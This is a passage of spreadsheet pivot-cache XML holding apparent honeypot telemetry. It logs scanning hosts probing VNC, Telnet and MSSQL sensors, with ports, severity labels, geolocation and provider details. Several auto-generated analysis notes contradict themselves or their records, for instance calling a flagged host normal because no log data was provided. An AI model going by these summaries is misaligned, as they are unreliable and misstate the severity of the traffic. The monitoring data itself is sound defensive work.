    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_SSH_H1&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H14"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;22&amp;&amp;31070&amp;&amp;51173&amp;&amp;50721&amp;&amp;57954&amp;&amp;61144&amp;&amp;59043&amp;&amp;58136&amp;&amp;56253&amp;&amp;55723&amp;&amp;49403&amp;&amp;59115&amp;&amp;57220&amp;&amp;52807&amp;&amp;61915&amp;&amp;54151&amp;&amp;60647&amp;&amp;63558&amp;&amp;61918&amp;&amp;50937"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2021-04-01"/>
    <s v="DYNU"/>
    <s v="2023-01-12"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3ec5"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="505"/>
    <x v="505"/>
    <s v="unassigned.172-81-62-181.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T00:16:38"/>
    <d v="2024-04-11T11:07:00"/>
    <d v="2025-04-29T00:16:38"/>
    <n v="640"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_MT-CPA_H31&amp;&amp;SMA-LAB_VNC_H26"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;23671&amp;&amp;57326&amp;&amp;52230&amp;&amp;64928&amp;&amp;58181&amp;&amp;56429&amp;&amp;61475&amp;&amp;64795&amp;&amp;52127&amp;&amp;54440&amp;&amp;50406&amp;&amp;56794&amp;&amp;51401&amp;&amp;62963&amp;&amp;56253&amp;&amp;55668&amp;&amp;52540&amp;&amp;61681&amp;&amp;60112&amp;&amp;57220&amp;&amp;64960"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2021-04-01"/>
    <s v="DYNU"/>
    <s v="2023-01-12"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3eb5"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No VNC (Virtual Network Computing) activity detected, suggesting potential attempted access or scanning for vulnerable services. This might be an exploratory scan by malicious actors looking for vulnerabilities to exploit. However, no actual connection was established. &amp;&amp; No available log data provided."/>
    <m/>
  </r>
  <r>
    <x v="506"/>
    <x v="506"/>
    <s v="unassigned.172-81-62-202.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T00:15:32"/>
    <d v="2023-08-29T23:41:06"/>
    <d v="2025-04-29T00:15:32"/>
    <n v="745"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_SSH_H27&amp;&amp;SMA-LAB_MT-CPA_H26&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H38&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H26"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;58859&amp;&amp;22&amp;&amp;4383&amp;&amp;59154&amp;&amp;52620&amp;&amp;50437&amp;&amp;62854&amp;&amp;52914&amp;&amp;52524&amp;&amp;53556&amp;&amp;55619&amp;&amp;62960&amp;&amp;62489&amp;&amp;50679&amp;&amp;54760&amp;&amp;49277"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3eca"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="507"/>
    <x v="507"/>
    <s v="unassigned.172-81-62-240.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T00:12:27"/>
    <d v="2024-04-09T09:41:00"/>
    <d v="2025-04-29T00:12:27"/>
    <n v="689"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_MT-CPA_H18&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H4&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H19&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_VNC_H47"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;44539&amp;&amp;61201&amp;&amp;62341&amp;&amp;60675&amp;&amp;53352&amp;&amp;54596&amp;&amp;52628&amp;&amp;61361&amp;&amp;60648&amp;&amp;58044&amp;&amp;63079&amp;&amp;50313&amp;&amp;49691&amp;&amp;63408&amp;&amp;60786&amp;&amp;58252"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="2021-04-01"/>
    <s v="DYNU"/>
    <s v="2023-01-12"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3ef0"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="508"/>
    <x v="508"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T00:11:41"/>
    <d v="2025-03-08T13:01:11"/>
    <d v="2025-04-29T00:11:41"/>
    <n v="49"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H27"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="CO"/>
    <s v="Colombia"/>
    <s v="ANT"/>
    <s v="Antioquia"/>
    <s v="Yarumal"/>
    <s v="Yarumal"/>
    <s v="3665741"/>
    <s v="NA"/>
    <s v="6.96321"/>
    <s v="-75.4174"/>
    <s v="269990"/>
    <s v="INTERYA S.A.S"/>
    <s v="Interya S.A.S"/>
    <s v="business"/>
    <s v="INTERYA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bb49:b089"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="509"/>
    <x v="509"/>
    <s v="unassigned.172-81-62-174.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T00:11:35"/>
    <d v="2024-04-13T15:56:38"/>
    <d v="2025-04-29T00:11:35"/>
    <n v="600"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H6&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_SSH_H9&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_VNC_H35&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_VNC_H29&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_MT-CPA_H16&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H22&amp;&amp;SMA-LAB_VNC_H16&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H19"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;22&amp;&amp;49367&amp;&amp;54728&amp;&amp;52365&amp;&amp;52751&amp;&amp;60077&amp;&amp;61921&amp;&amp;52235&amp;&amp;53210&amp;&amp;56909&amp;&amp;60494&amp;&amp;61013&amp;&amp;58585&amp;&amp;50390&amp;&amp;54146&amp;&amp;55197&amp;&amp;59271&amp;&amp;54769&amp;&amp;55341"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3eae"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="510"/>
    <x v="510"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T00:11:14"/>
    <d v="2025-04-15T20:50:55"/>
    <d v="2025-04-29T00:11:14"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;abuseipdb"/>
    <s v="1433&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="RU"/>
    <s v="Russia"/>
    <s v="KDA"/>
    <s v="Krasnodar Krai"/>
    <s v="Sochi City"/>
    <s v="Sochi"/>
    <s v="491422"/>
    <s v="NA"/>
    <s v="43.6028"/>
    <s v="39.7342"/>
    <s v="28761"/>
    <s v="CrimeaCom South LLC"/>
    <s v="CrimeaCom South LLC"/>
    <s v="business"/>
    <s v="CrimeaCom South LLC"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c31a:5139"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No log data provided, therefore no analysis can be performed. &amp;&amp; The log shows an empty field for network activity, indicating no malicious traffic has been recorded yet. The absence of any data suggests that the system is still monitoring and waiting to detect potential threats. No malicious activity has been detected at this time."/>
    <m/>
  </r>
  <r>
    <x v="511"/>
    <x v="511"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T00:11:05"/>
    <d v="2025-02-07T07:48:28"/>
    <d v="2025-04-29T00:11:05"/>
    <n v="297"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA&amp;&amp;63881&amp;&amp;45096&amp;&amp;45097&amp;&amp;19308"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KZ"/>
    <s v="Kazakhstan"/>
    <s v="75"/>
    <s v="Almaty"/>
    <s v="Karasay District"/>
    <s v="Almaty"/>
    <s v="1526384"/>
    <s v="050000"/>
    <s v="43.238"/>
    <s v="76.8829"/>
    <s v="9198"/>
    <s v="JSC Kazakhtelecom"/>
    <s v="JSC Kazakhtelecom"/>
    <s v="business"/>
    <s v="Rgurk"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:58cc:9972"/>
    <s v="C-I_D"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="512"/>
    <x v="512"/>
    <s v="111-70-28-234.emome-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T00:11:00"/>
    <d v="2025-04-23T14:45:00"/>
    <d v="2025-04-29T00:11:00"/>
    <n v="25"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;abuseipdb"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.032"/>
    <s v="121.526"/>
    <s v="17421"/>
    <s v="Mobile Business Group"/>
    <s v="EMOME"/>
    <s v="cellular"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6f46:1cea"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No log data provided, unable to analyze. &amp;&amp; The data indicates that there was no Telnet activity detected within the monitored period, suggesting no malicious Telnet attempts were made during this time. No suspicious traffic or connections involving Telnet protocol were identified. Overall, it appears to be a normal situation with no signs of malicious activity related to Telnet. &amp;&amp; No log data provided, cannot analyze malicious activity."/>
    <s v="TELNET Scan"/>
  </r>
  <r>
    <x v="513"/>
    <x v="513"/>
    <s v="unassigned.172-81-62-221.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T00:10:41"/>
    <d v="2024-04-15T09:27:29"/>
    <d v="2025-04-29T00:10:41"/>
    <n v="614"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_VNC_H30&amp;&amp;SMA-LAB_VNC_HC1&amp;&amp;SMA-LAB_VNC_H10&amp;&amp;SMA-LAB_VNC_H46&amp;&amp;SMA-LAB_VNC_H27&amp;&amp;SMA-LAB_VNC_H23&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_VNC_H24&amp;&amp;SMA-LAB_VNC_H14&amp;&amp;SMA-LAB_VNC_H44&amp;&amp;SMA-LAB_VNC_H36&amp;&amp;SMA-LAB_VNC_H32&amp;&amp;SMA-LAB_VNC_H34&amp;&amp;SMA-LAB_VNC_H11&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_VNC_H5&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_VNC_H41&amp;&amp;SMA-LAB_VNC_H25&amp;&amp;SMA-LAB_VNC_H12&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H26&amp;&amp;SMA-LAB_VNC_H45&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_VNC_H7&amp;&amp;SMA-LAB_VNC_H8&amp;&amp;SMA-LAB_VNC_H47&amp;&amp;SMA-LAB_VNC_H33&amp;&amp;SMA-LAB_VNC_H13&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_VNC_H31&amp;&amp;SMA-LAB_VNC_H21&amp;&amp;SMA-LAB_VNC_H39&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_VNC_H17&amp;&amp;SMA-LAB_MT-CPA_H47"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;5900&amp;&amp;64902&amp;&amp;52693&amp;&amp;61233&amp;&amp;64040&amp;&amp;61239&amp;&amp;59057&amp;&amp;56716&amp;&amp;52966&amp;&amp;57046&amp;&amp;65330&amp;&amp;56021&amp;&amp;63084&amp;&amp;51613&amp;&amp;65333&amp;&amp;64149&amp;&amp;62146&amp;&amp;56777&amp;&amp;49823&amp;&amp;50826&amp;&amp;53062"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="AZ"/>
    <s v="Arizona"/>
    <s v="Maricopa"/>
    <s v="Phoenix"/>
    <s v="5308655"/>
    <s v="85001"/>
    <s v="33.4484"/>
    <s v="-112.074"/>
    <s v="398019"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="business"/>
    <s v="Dynu Systems Incorporated"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ac51:3edd"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="This indicates an attempt to connect to the VNC service without providing any data, which could be a probing or reconnaissance activity by a potential attacker. The lack of credentials suggests that this may not be a legitimate access request. This behavior is unusual and warrants further investigation."/>
    <m/>
  </r>
  <r>
    <x v="514"/>
    <x v="514"/>
    <s v="unassigned.172-81-62-245.spryt.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-29T00:10:31"/>
    <d v="2024-04-15T10:07:05"/>
    <d v="2025-04-29T00:10:31"/>
    <n v="656"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
